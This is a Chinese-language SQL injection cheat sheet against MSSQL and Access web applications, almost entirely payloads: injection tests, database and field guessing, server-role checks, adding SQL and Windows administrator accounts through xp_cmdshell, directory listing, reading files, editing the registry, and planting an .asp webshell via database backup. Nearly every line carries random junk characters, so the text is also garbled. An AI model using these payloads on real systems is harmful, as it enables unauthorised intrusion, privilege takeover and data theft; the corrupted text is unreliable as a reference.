1.判断是否有注入;and 1=1 ;and 1=2 /Nns3oE
2.初步判断是否是mssql ;and user>0 |}Mt hj9n
?KG4Z
3.注入参数是字符'and [查询条件] and ''=' ~(]'ah,
A u"BDP
4.搜索时没过滤参数的'and [查询条件] and '%25'=' TGuCIc0B{
t(1gJZs>kX
5.判断数据库系统 T'a&
`a5,5}7v%`
;and (select count(*) from sysobjects)>0 mssql A`1-c
R~BFZF>:
;and (select count(*) from msysobjects)>0 access _7<G6q2(
{EJ+
FTu<$`!1L
&Z%'xAOGR
6.猜数据库 ;and (select Count(*) from [数据库名])>0 *1h@Jb34
'j;i4ie>*x
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 \_ MWZRMc5
y\R-=Am".
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 :PNhX2F
vHN/~k#
9.(1)猜字段的ascii值(access) \m(>Q
MbeK{8~E%l
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Z/LYTo$Bz
9Us'Q{CD
(2)猜字段的ascii值(mssql) l $0w 9Z^
Rp
!Rzl<
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 lL&p?MUp
<7o@7r'0
10.测试权限结构(mssql) c*",AZ>U
c=<^pCa9t1
2 ]}e4@{
mh35S!I3I^
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- /w2NO9Q
F41g Mg
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- m}t`43}QE
Q}uh`?t
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- wsgT`M'J[
-BH T'zq1S
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- \~.elKw<U
uFL!*#A
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- @%!Gj{
W?0u_F
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Hk?E0.
-Fc 9mv(H
;and 1=(select IS_MEMBER('db_owner'));-- kfq<M7y
wrVR[v>E<
syk,e4:oA
NN~PWy1opa
11.添加mssql和系统的帐户 $'KhA6u
caZEZk#r;
;exec master.dbo.sp_addlogin username;-- GK&R.R]
;exec master.dbo.sp_password null,username,password;-- RQ,X0pS
W=4|ahk$
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Lbu,VX
Qm4cuV-0{
;exec master.dbo.xp_cmdshell 'net user username password z5W;-sCz
|T{ZDJ+
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 5#::42oE
iOiXo6YE
;exec master.dbo.xp_cmdshell 'net user username password /add';-- X
[;n149o
Tvw(Sq};
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- \3whM6tK
0gr#<(
5D>cbzP@
XQcE
ZJ2
12.(1)遍历目录 S9 @*g3
5K00z?kD2V
;create table dirs(paths varchar(100), id int) Y{L|ja%9?
10*^
;insert dirs exec master.dbo.xp_dirtree 'c:\' iBCIJ!;
V,eH E5C
;and (select top 1 paths from dirs)>0 29NP!W
/g
Hr/J6kyB)
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 2>im'x 5
MJ.Kor
x)T07,3:
U!T#'H5'-
(2)遍历目录 kS_37-;
3Z74&a$
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- X
iM{YZ`B
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ar@ysBy
uN6xOq/
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 uR82},r$m
BA_l*h%=Cc
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 }tedh
7G_OFD
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 >2tosxH M
3,Bm"'b6
_? u} Jy_
`;&=m,
W'
13.mssql中的存储过程 r8!M8Sc
+N!/>w]n
xp_regenumvalues 注册表根键, 子键 #M92=IH
D$SO 6X~
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 #e6x_o|
nG"Ae8r
xp_regread 根键,子键,键值名 k_1oj[O
VqeW;8&*iv
;exec xp_regread cQh=Mri]
s$VLVT*6
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 DkBVk+
bfA9aT
xp_regwrite 根键,子键, 值名, 值类型, 值 v9Ez0 :)
bM
$WU?Z
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 'Y5=A!*@tf
a0Q\]S
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 CvqUaHW@
KQ.cd]6
xp_regdeletevalue 根键,子键,值名 IO?6F@(
iD2>-yf
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 (rSBzM]H
6d YUMqQ
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 @m"P_1`*
>{juw&Uu
r'u[>uY
\fL:Ie
14.mssql的backup创建webshell `Dv&.
a4N8zDS
use model n:YA4t7S
'w}/o+x@
create table cmd(str image); &qZ:"k
|*zvaI(}
insert into cmd(str) values (''); Q3x.qz
2LH.I f
backup database model to disk='c:\l.asp'; i%9xt1c_
S;S_<GX
K|-RAjE
vC5y]1QDd
15.mssql内置函数 eh$T
3_#q
,T7(!)dR
;and (select @@version)>0 获得Windows的版本号 b=Y3O
)nUTux0K\
;and user_name()='dbo' 判断当前系统的连接用户是不是sa GK:pt8=
[T#9#3
;and (select user_name())>0 爆当前系统的连接用户 Mhg_z.Z
L@6T~
;and (select db_name())>0 得到当前连接的数据库 vm "dE4W=
F%
K}&3
o<%s\n
sxQMfbN
16.简洁的webshell )9>E} SU/
MIwkFI8
use model WhR'MkfL
AN-;*n<'
create table cmd(str image); @KC;"u'C
#[Vk#BIiv8
insert into cmd(str) values (''); pJ]i)$M
Mhze!!
backup database model to disk='g:\wwwtest\l.asp';